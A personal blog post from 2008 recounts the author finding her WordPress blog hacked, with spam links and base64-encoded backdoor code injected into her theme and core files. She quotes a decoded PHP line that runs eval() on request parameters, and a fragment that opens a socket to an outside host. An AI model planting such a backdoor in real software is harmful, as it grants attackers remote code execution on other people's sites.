By Jennifer 8. Lee | August 23, 2008
In poking around my blog because of layout issues, we discovered I had a bunch of spam links in my footer. Like a hundred links to latech.edu, with horrible things like cialis and viagra. About a month ago, I started noticing some very strange search queries bringing people to my site, like “pantyhose” and things I can’t write here (sexual acts, anatomy, and fluids and stuff) to my blog. I was perplexed. I didn’t use these terms. What was going on.
So today, it all became clear. Turned out I had been hacked, perhaps it had to do with some WordPress vulerability.Â I felt really violated.
Anyway, in my templates. I went and looked in my header.php file on WordPress I was horrified to find something that started with this
Which is a “code” for normal text. Decoded it became this:
if(@$_REQUEST["A"] == “b” and isset($_REQUEST["C"])) eval(stripslashes(stripslashes($_REQUEST["C"])));
Which totally was sketchy. I also found anther one, which I couldn’t decompress by myself
That came to this:
$path=”/blog”;@$s = fsockopen (“pub.supercyborg.info“,80);fputs($s,
I removed these and the spam was still there! And also, I switched out theme, and it was still there. So it had to be in the WordPress files.
And we had just done a WordPress upgrade so all of the files had been recently updated — so we couldn’t look at timestamps to figure out which files had been touched. But you could do a search for the base64 phrase. It turned out that some of the WordPress files themselves had been infected, like wp-functions.php And then another one of my files template-functions-comments.php was the one with all the bad things in it.
(blah). But luckily I have adorable high-quality tech help which purged it for me. I’m eternally grateful!
Comments are closed.